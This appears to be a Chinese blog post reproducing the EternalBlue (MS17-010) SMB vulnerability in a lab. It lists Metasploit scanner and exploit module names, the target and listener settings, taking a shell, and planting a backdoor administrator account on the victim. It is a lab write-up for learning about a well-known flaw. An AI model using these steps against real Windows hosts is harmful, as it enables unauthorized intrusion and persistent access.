概述
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。
由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码。
实验
查看数据库是否开启service postgresql status
dead表示关闭
开启数据库
利用kali系统
打开msf
查看数据库情况,说明连接成功
搜索ms17_010
使用下面两个模块
扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue
关注RHOSTS主机段和THREADS线程,默认为1
设置扫描主机段
设置线程
Run开始扫描
用wireshark抓包
跟踪TCP流,得到靶机基本信息
发现了目标主机的系统和ip
进行攻击
设置攻击目标set rhost
设置监听主机set lhost
options帮助
开始攻击exploit
直接拿到shell
ipconfig
确认是目标主机
种植后门
创建一个用户
并查看
加入管理员用户
并查看
成功植入用户
最后
以上就是勤恳小白菜为你收集整理的永恒之蓝(ms17-010)漏洞复现的全部内容,希望文章能够帮你解决永恒之蓝(ms17-010)漏洞复现所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复